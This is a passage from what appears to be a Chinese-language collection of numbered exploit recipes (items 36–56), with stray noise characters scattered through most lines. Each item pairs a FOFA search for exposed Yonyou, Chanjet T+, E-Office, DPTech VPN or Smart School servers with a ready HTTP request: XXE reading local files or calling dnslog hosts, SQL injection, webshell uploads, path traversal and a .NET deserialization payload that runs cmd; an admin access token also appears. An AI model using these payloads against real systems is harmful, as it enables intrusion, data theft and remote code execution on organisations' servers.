- H$ E. @. f5 a7 U) a# Y1 w* ?2 ]9 sUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( k; y8 T8 x5 X+ a7 h3 R
Accept-Encoding: gzip, deflate7 L, p" c7 |) K
Accept: */*
5 a, F, l& S6 ~) y* a ~/ C" pConnection: close( ^: a0 K$ ?! h6 s) {
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+ k9 l$ h# l4 u3 }) K3 @7 OContent-Length: 190
2 Y- H2 [& o$ k. E/ d. n$ {8 `Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
" ?9 G4 n0 ]% ~" B
8 b4 H! b/ ]/ i- G: V--fd28cb44e829ed1c197ec3bc71748df00 {, c3 w8 P4 ]* I. h! d
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"% h/ I3 F2 M2 H
8 l6 c# {0 a9 m8 O+ N# h
<%out.println(1111*1111);%>
" O7 j9 d( ~; m3 ?1 Y--fd28cb44e829ed1c197ec3bc71748df0--
" ^" o# K: }8 }. {
, a. H* l" ~9 \1 d3 J( N
# L7 k# x" X% `36. 用友NC-Cloud soapFormat XXE
% e. A$ p0 _% v1 QFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" @2 G, x! W9 E: ]6 GPOST /uapws/soapFormat.ajax HTTP/1.10 U5 q& _! ^$ |5 l' ^
Host: 192.168.40.130:8989
' A3 }2 |; A. w( C1 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
& G. U) G4 K: y) BContent-Length: 263
9 M/ n2 E5 W2 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, T5 K4 J7 c3 ]* C. T3 Q1 cAccept-Encoding: gzip, deflate- X; C) q5 K& r: U+ R( U: J8 l/ D8 K1 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 B" @, J: H0 K @$ S& o
Connection: close
$ a: ]/ P$ u4 p0 i4 h$ D- XContent-Type: application/x-www-form-urlencoded" ]: y5 f( M2 J5 x |8 f& C
Upgrade-Insecure-Requests: 12 a* e4 ~9 }3 o7 M+ L% j I( g+ P9 F
; a: w J2 v1 P1 B8 V; H
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
! m! e3 j3 r" a$ e4 _6 G: \( ?9 P0 b5 _) f" e0 Z
* {- r* s; D( x; X6 O5 g F% F
37. 用友NC-Cloud IUpdateService XXE! u3 `( ~9 T* I
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"& F. B1 h2 R4 W: t
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
! [. d3 a( [; ?" K9 o8 s4 }4 X! xHost: 192.168.40.130:8989
$ z& K* ~% H# S: v3 T/ x( eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.361 Y, C/ F/ S1 b5 V) g+ L! H/ k
Content-Length: 421& f9 P8 U4 d, [/ C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ }, _: [9 r( @" x
Accept-Encoding: gzip, deflate
8 F+ S- a4 G* gAccept-Language: zh-CN,zh;q=0.9; f+ j' v+ U. M. P |
Connection: close
# x" _, ?+ A' l' c% j5 e7 Q EContent-Type: text/xml;charset=UTF-8# |" i3 J# v+ ]6 x' `! u
SOAPAction: urn:getResult5 Q! b0 b# Z$ R" ^. ^( u
Upgrade-Insecure-Requests: 1
& {4 m/ H. g$ g2 ?3 `
; H$ j! a) R- a' K, m; B<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
! o; K- \ j6 L: p. d<soapenv:Header/>
% e k S4 w) |% ~! g- }, b. w<soapenv:Body>' S( Y, n, o* R6 P' r0 \! c
<iup:getResult>* |( P% B/ w: G; f& w2 q6 S
<!--type: string-->
# n7 c6 R0 x3 e" W7 A: B" `- o' c<iup:string><![CDATA[
; q1 d( f: R) k& {1 j5 K! T5 ]<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
- `( L% S& T6 ~1 s! a7 v Z U<xxx/>]]></iup:string>
9 N' E/ t9 j9 A: w/ D</iup:getResult>
9 Z% J$ s$ g/ l' c</soapenv:Body>( D! W( F4 a6 h' u3 s
</soapenv:Envelope>0 Q& u- L- I) {' P8 N* a$ R& a1 U4 L
' D2 E/ }3 {+ T* J" C6 e
1 t# w$ j/ t; I1 i
$ A$ ?& V9 v# f8 u, r8 K( ^38. 用友U8 Cloud smartweb2.RPC.d XXE$ i4 u" h% ]2 _* s4 g) o% o
FOFA:app="用友-U8-Cloud"
9 ~. v; W# @, n2 jPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1$ ]) }4 E" N! T( q& s6 a
Host: 192.168.40.131:8088: K$ ]. w% N, V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25- V/ Z8 E! {% W
Content-Length: 2604 f7 J$ |/ a- h& F% G+ p6 ^: j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
4 m1 o- [4 e; w; Z; QAccept-Encoding: gzip, deflate3 Z, c% ~( s5 e
Accept-Language: zh-CN,zh;q=0.9$ K8 G7 Q2 V+ F- H; \6 m/ N1 J
Connection: close1 K* {; y& z! ?0 t# A0 a
Content-Type: application/x-www-form-urlencoded# W, y: }9 T. F% q
' ~* v+ x8 J2 d" a__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
: C" y6 [. I' S
. v/ c5 u3 A; i% Q/ b5 `# h+ g2 v- R& t9 }
39. 用友U8 Cloud RegisterServlet SQL注入
8 c; B6 d0 B7 @8 b3 O: Y( j# }& X, sFOFA:title="u8c"' ~5 x, _" q, L
POST /servlet/RegisterServlet HTTP/1.1
. T# C5 m0 ?' H. V G. C1 E# gHost: 192.168.86.128:8089
$ a6 R# w: T! ^' iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
' w9 u- e7 K; c0 X# | kConnection: close
Y% z- {# T" TContent-Length: 85
" M1 K( s* z! Y+ R h, J) w1 E) EAccept: */*8 o& f! \8 w4 D" t0 }3 ?4 u" |
Accept-Language: en" i' C' [7 ^0 i6 B, S( T4 \: n% B( ]
Content-Type: application/x-www-form-urlencoded
( X+ l4 K, y: _% Q# JX-Forwarded-For: 127.0.0.1% H4 K( Q0 _2 u0 ~4 I& H
Accept-Encoding: gzip
0 m9 L; W% F/ R3 P* s. ^% v+ H6 ~1 W- B( L/ J+ t' \: h
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--& _- P2 q8 ?( t, c E
3 A; b9 T0 f* b4 C N4 k4 {
; V9 A0 A2 Z0 s6 E! a
40. 用友U8-Cloud XChangeServlet XXE/ N# L1 P8 H6 L4 \) h: \% d
FOFA:app="用友-U8-Cloud"
8 J$ U% Y% E$ l; p rPOST /service/XChangeServlet HTTP/1.1
0 t- g1 Y3 E# m5 Z/ _Host: x.x.x.x$ o6 w: f' G- _( p# e% u9 V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ }. ~. Z3 v! |9 EContent-Type: text/xml* h% t6 H& J' I" E# u9 c9 c
Connection: close- u7 u( \- o& J& b: P7 q$ W
7 Y) H/ `! o: P' y8 J
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
/ J% d% a3 l( R; b" M+ V. E4 ^/ l
0 a5 Z5 ~6 f: o9 e/ D# K Y, G7 X$ I0 H3 M% \0 U
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入( }4 ~/ o# L! A M: [& f! D
FOFA:app="用友-U8-Cloud"' q: {5 t/ b3 W# j! `
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
" c m1 c+ F7 |6 M1 p9 N$ {Host:
]& I m7 m0 F. iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* p7 f" }' O% _8 A* l
Content-Type: application/json
: O% {! i4 l; p. WAccept-Encoding: gzip
7 L* f1 A$ h2 J$ l! Q! nConnection: close
2 i1 D) S4 `6 q3 n6 ~2 M+ B4 ]7 x, \: ?/ b9 v* |- w9 e$ m, |1 K
7 `; t( b0 @- f' C6 |) G
42. 用友GRP-U8 SmartUpload01 文件上传 M# G6 z- B7 C1 [# O# a
FOFA:app="用友-GRP-U8"
6 ~9 P" ? ~7 G: pPOST /u8qx/SmartUpload01.jsp HTTP/1.19 |& X$ o) c$ F( e# J1 ]& J7 {
Host: x.x.x.x
; {& g& e7 |2 A2 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt. A I$ x' k) _6 g6 M# @1 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36* _0 A& R3 F- \' m6 {( n) x
0 A$ a8 N Y. A4 n
PAYLOAD
! h* r2 p$ O. N* C2 o$ z* J
! V. f2 v' Z8 D5 y# n8 l- Y/ N+ P! D" V/ S2 ]
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
0 B. E; O2 B1 s# u* Y1 Y1 e& R+ I8 {. w0 N3 o
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. F$ W* q$ g: i/ d8 ] d. hFOFA:app="用友-GRP-U8"% T; U) d" G; l, T7 ?" Z
POST /services/userInfoWeb HTTP/1.1
: f2 w+ l2 r/ x8 p6 hHost: your-ip) @: j0 E( k# u) T. w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. P) s) [- i _2 V2 u9 X) V* V% @- }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 ~8 D1 O8 z! B2 {Accept-Encoding: gzip, deflate+ g j" ]" ?9 P, _% ]+ F
Accept-Language: zh-CN,zh;q=0.9' u" L5 ~# z- W2 q& E! x! q+ \
Connection: close6 X+ a, D7 ?4 S" I4 Q6 O+ [
SOAPAction:
$ e/ T5 c* P7 n0 C0 `8 J% l$ RContent-Type: text/xml;charset=UTF-8
0 w, `. I9 V" w+ r4 ?/ a6 X+ ?$ t8 n# m8 s' Q5 _. J& I
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
8 x e. B! H+ _5 {; ^/ W6 H6 j <soapenv:Header/>
* i( _& _ N$ J <soapenv:Body>
% l2 `/ x6 ~" Q0 ~ @+ J <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
& ~& K# D% @. U4 L* B. L <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>% \; s# N7 D. d6 j
</ser:getUserNameById>
' f& E. U% M0 {/ C7 r* e. F </soapenv:Body>
2 z1 a {( o; v; d4 V</soapenv:Envelope>
. ?7 z; H# _, W5 S9 t" m
8 d/ t: Y; B: X$ q& g2 n& j$ Y1 J) A* p4 M5 s$ c9 a
44. 用友GRP-U8 bx_dj_check.jsp SQL注入; Z0 h0 I' A' G" s
FOFA:app="用友-GRP-U8" X/ _/ j, k: v3 s7 G- _ @
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1; V! ~6 l$ } N! b% k* S& V) `
Host: your-ip, ]' C ?7 J) x$ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' F3 e* V# Q9 Z2 G$ f# X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ ~$ p4 g# K& o( ~5 F2 X! `' t
Accept-Encoding: gzip, deflate: A W4 f; `/ [2 N B: b& N, f: \
Accept-Language: zh-CN,zh;q=0.9
, ~, I& a6 R3 }. m7 e ^Connection: close" Z% S3 W3 b! g" y" i
* ]+ K1 c0 R- T0 r' Q1 j# T. J3 ]1 D, ~
45. 用友GRP-U8 ufgovbank XXE
$ f, E% M2 S) z9 _FOFA:app="用友-GRP-U8"
) l" X, F- f! @3 {7 SPOST /ufgovbank HTTP/1.16 |8 e! V( Z; M" J
Host: 192.168.40.130:222! m( M* w- i" g- E( \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.01 g) V* j2 ~% M- E- A7 S/ N2 `9 P0 c& p. J
Connection: close
1 X! l: ]1 V4 V) LContent-Length: 161
( {0 E( d/ M7 ~, [ J" R- IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 ?( L" s1 V# D' b4 ~ c+ q. IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ C- L- r/ A3 y( y: s
Content-Type: application/x-www-form-urlencoded( O) _; O& [+ R
Accept-Encoding: gzip* _ w6 _) B U N+ r6 _
4 d F! i7 T7 p6 F' E& ]reqData=<?xml version="1.0"?>
: r& m7 i- O. f5 J% z! y4 f<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest1 X# z# R: c* M6 @; |3 i. B' q
. c+ k9 D6 p" [5 v) Y$ q
' q' I2 s0 v& l46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( b8 [3 f g$ K% oFOFA:app="用友-GRP-U8"
% n; P: J9 c1 Y5 _# \, d! OGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.18 Z! L, W( I' G& {" `
Host: your-ip
3 V2 R1 |) D8 G$ J9 i% }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" @ c; G+ t: e* I6 H: v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ N+ v. N E! c; w
Accept-Encoding: gzip, deflate
' a5 P! y' u0 u5 p' D; hAccept-Language: zh-CN,zh;q=0.99 ?0 u0 V& F3 p: q+ k1 d! q# S$ a
Connection: close
6 I" o0 v% V8 x+ p3 T4 _
+ z8 x+ M$ T6 s4 m5 r0 Y3 q1 v5 r A4 |3 ^) w; M' H
47. 用友GRP A++Cloud 政府财务云 任意文件读取
& o( r7 G' ]: }" {; H8 Y A5 NFOFA:body="/pf/portal/login/css/fonts/style.css"& M6 g8 o: h) j; G, \/ z
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1' l: |9 W% O/ J! I3 y! B' g
Host: x.x.x.x2 a4 ]9 o) V# x& n/ U a
Cache-Control: max-age=0
2 D& g8 Z c7 }9 r6 o U( [0 IUpgrade-Insecure-Requests: 13 {" r+ f3 w7 [: D# \* `* s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. H! `, @8 ~- J; J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 p m7 W! `) P; U
Accept-Encoding: gzip, deflate, br- b; v0 Y! f5 j6 ~
Accept-Language: zh-CN,zh;q=0.93 V% V) ?8 R0 S# o
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
: P" G1 h# j, ]3 l' sConnection: close R' M( v- b& D8 V s
; @* G3 {5 ]3 R9 D+ a
- K+ X! e( e9 z4 l4 e
$ g5 y0 b8 Z: F2 h( J+ p# u48. 用友U8 CRM swfupload 任意文件上传
8 ~0 S$ }3 M' O5 L1 I5 gFOFA:title="用友U8CRM"
+ m) o# p2 E% P. k8 M8 |; T& x( hPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ d8 ~9 C- j6 a7 Q, m& ~8 h1 F
Host: your-ip
! [" L$ l# t) N6 j6 P0 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 E4 f; L! ~2 f2 R$ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ _* r3 n% d' K: e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 B# U6 N3 ~' U' R' m9 l& WAccept-Encoding: gzip, deflate$ G o& y* B+ |1 i5 } Z; \
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855! |: P4 {& N R1 a9 R9 K
------269520967239406871642430066855+ S3 |2 H( s& B4 ?9 j6 C9 d
Content-Disposition: form-data; name="file"; filename="s.php"
8 ]- Y* h$ k1 [; g# B5 X12317 {5 x- x5 D! v$ C3 M
Content-Type: application/octet-stream
9 x8 [% b) Z0 [) B------2695209672394068716424300668558 F2 a6 g Y9 L# Z1 u* X0 @
Content-Disposition: form-data; name="upload"3 a4 n. H- I& Z. d% ?
upload7 h% L, s _) f5 y8 U7 T- J
------269520967239406871642430066855--
" q, R5 ]3 @; Y' j3 |2 N$ M& U' F7 ~# z5 c8 |( t
0 n: w- x5 k4 E4 l0 `49. 用友U8 CRM系统uploadfile.php接口任意文件上传
' l! e, H/ w7 v1 G3 F8 }, z: B4 r. MFOFA:body="用友U8CRM": P; M6 B+ J! g, ]
3 ]' C+ E' S- _0 S1 g
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
, u2 M: q8 y% H2 {' P% z! P I ?Host: x.x.x.x; q. x7 q5 p% r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 ]% j& J9 X. L4 t/ }
Content-Length: 329; L. f' j/ c$ C. \$ K5 z. T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 o1 c" c0 U5 s# R5 d3 U8 f; H; EAccept-Encoding: gzip, deflate
3 T$ u7 X! B* a2 w. HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 @3 T7 k3 G" q% [2 }0 p
Connection: close, g' {) M- v: U6 R% T
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w1 e3 u" K, b6 L% F6 o6 p
# a% ^+ v. Y5 x% y2 F/ S
-----------------------------vvv3wdayqv3yppdxvn3w
3 h- `; @! d; w: Q8 o: {Content-Disposition: form-data; name="file"; filename="%s.php "- H! j0 f, t+ z. P
Content-Type: application/octet-stream
$ _- ]4 z) A1 q( x0 z$ F4 z
" B- c8 U; }8 kwersqqmlumloqa! O4 b0 l5 U0 }3 n; P, E
-----------------------------vvv3wdayqv3yppdxvn3w7 j( p# M3 B# Z1 l
Content-Disposition: form-data; name="upload"
& o0 t$ T7 t* L! b7 M1 x
) O* p! c: I+ i i9 g) |upload1 b; J; ^5 }1 j2 G- J/ D4 y
-----------------------------vvv3wdayqv3yppdxvn3w--
3 X q, h# H u4 H; ~* K6 r' n$ ^1 |" K4 \! h
( T( P4 [6 }3 m+ K" u ]
http://x.x.x.x/tmpfile/updB3CB.tmp.php
$ Q/ g. z( o& M% B) Q! [! g \8 {* Y) Z& O0 c' D
50. QDocs Smart School 6.4.1 filterRecords SQL注入
: X$ `' G/ l1 [: c- q# qFOFA:body="close closebtnmodal"
4 d* ^& W) O; n. o, _2 CPOST /course/filterRecords/ HTTP/1.1
* l3 I) o, m/ O1 p- p. aHost: x.x.x.x
3 S# g1 a9 c- T( \* O3 N( wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. [ p! e1 L* f) K; Z- IConnection: close
0 C' l5 E c* }: w3 XContent-Length: 224
7 }( l1 }& ^9 Z( s! T$ z( eAccept: */*
3 D0 T" |: }! A. nAccept-Language: en
8 C# U6 f4 w8 e- z: s5 y( E" QContent-Type: application/x-www-form-urlencoded
" S6 j2 k: g3 a6 E7 O9 b4 T: AAccept-Encoding: gzip
: D2 M- X, u" j$ c9 `% p/ J: b* e. T# n0 `6 [' w+ d
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
7 o4 Y6 c( B$ u3 g5 J/ v5 r
& U! p7 g8 H8 ]
* S) l; m4 Q+ T51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
9 w- x0 s" T: iFOFA:app="云时空社会化商业ERP系统"& a1 E$ h+ M* ] [6 u. b
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
( F9 L$ A+ e3 |- p5 k1 G" \Host: your-ip
- `% x& @5 L& L0 B/ B* U; ~; GUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' b3 O% ^) ]7 L) F: C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% b5 A2 W" R5 u% t# ]2 j
Accept-Encoding: gzip, deflate3 f1 P4 K2 \0 P
Accept-Language: zh-CN,zh;q=0.9
$ C5 u5 U) v& j+ w- ^5 R# [Connection: close
& R- U8 O2 l/ U: @5 O/ o
$ f. j' m% R1 Y& _8 T& d8 i3 C
$ ^9 x$ c1 \+ U3 m% A4 w52. 泛微E-Office json_common.php sql注入
( A' V6 U# \4 K( U' V, aFOFA:app="泛微-EOffice"
5 V0 @! X8 }! m- v5 Q+ h$ hPOST /building/json_common.php HTTP/1.1' k7 x- A$ B F% C3 M" G' u5 X
Host: 192.168.86.128:8097
: N- v, r) u; M" O' c/ |* kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. ~4 p0 z3 V! b1 w+ ]Connection: close' P/ H1 t1 ]9 }) }. P# C" ]
Content-Length: 87/ \- V' K7 x/ ^# I* f; `
Accept: */*
) u' {8 b6 b2 FAccept-Language: en6 X1 s) } k3 O0 r2 J" O
Content-Type: application/x-www-form-urlencoded8 t8 v) e! Q: w: R" v$ q4 `3 D
Accept-Encoding: gzip
j% w, w+ j# s F. k! ?7 ^; e1 ^. X7 b1 g2 F2 ?. h
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333# D* U- h" J% L" [# i: c
/ i! f" w' ]# @
9 W; l' I% Q2 }( {% p53. 迪普 DPTech VPN Service 任意文件上传9 D$ c+ x; k& v/ C& ]' S. V( i
FOFA:app="DPtech-SSLVPN"
# ^9 N- l9 g1 W2 \9 z+ x/ u$ j& |* Q/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
. w' L: U3 _' Y4 a0 B0 y( Q4 A6 k! ^/ }
1 y: g- J8 [8 H! }
54. 畅捷通T+ getstorewarehousebystore 远程代码执行9 q' |( [! A3 U0 p' i+ \/ _! Q. L! `
FOFA:app="畅捷通-TPlus"
]' L; H. P6 s# D% I% ^第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
* h8 _. J; j" ^"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
f8 j6 L1 z: x. b4 g, J- \" k- _ n3 k' g
/ d% `3 o% \" Z4 Z! O完整数据包
! ]: E; M- c; I RPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
2 X- e y, Y' ^- y& ZHost: x.x.x.x u3 h, p; s) l9 L2 _# c
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F; L) M/ f8 }1 c5 S+ T2 ~- T5 }
Content-Length: 593& Z4 v3 M6 i- u- R% |- G
* p1 P, A2 I$ f6 P2 n8 A# t
{
1 f6 \( J" Y0 ~4 Y) C9 J6 @7 d"storeID":{ [/ B' f9 u1 z& }
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 e( v# g% B( e7 a9 J
"MethodName":"Start",
6 E* k& O+ f9 g. g" i' C "ObjectInstance":{
6 J" p8 O" E7 D+ i: G "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& `% v: O2 m, Y; Y
"StartInfo":{
* ~; {$ e: ?" S$ j9 E. S "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 S1 v% O- c, N K- ` "FileName":"cmd",
5 `- ^' l+ }2 J' U7 L: f0 Z8 o "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"6 g7 N! _6 O8 ^( `2 ?
} `2 a# A6 b& U+ ?8 v
}
/ m' Z4 ~! g ~ }1 F( `# q6 Q$ k* B
}: n( C9 a8 y2 w5 O! U6 ^5 c
" t O1 v9 A" Q9 x0 [1 o
, `$ X' T L' t; M, e8 |第二步,访问如下url! X3 L3 X4 Q* N c: @3 G
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
8 i6 @! R2 G& P/ n
9 ~" |/ J6 _* ~& r; A' E
% {$ t3 p- s2 ]$ |3 B55. 畅捷通T+ getdecallusers信息泄露
- R1 s, H" G }, L& S' B8 X Q* nFOFA:app="畅捷通-TPlus"8 |7 ?: n2 O( ~2 ^% |6 p
第一步,通过
6 Y! Q) Z) N, B2 _# I3 D! W/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
, a2 n& ]0 Z7 h( p第二步,利用获取到的Cookie请求; u5 ?3 f( y' `; z% [# p' H
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers+ s. h% P7 Y, l7 N h# T
0 k) F U& _/ b, N+ u
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
& C4 s/ L/ i/ @" U, ]* k1 DFOFA: app="畅捷通-TPlus"2 h' \, [/ K ^$ h2 @' Y5 v9 O
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
. l* g$ t3 m C3 K) Q, T2 nHost: x.x.x.x
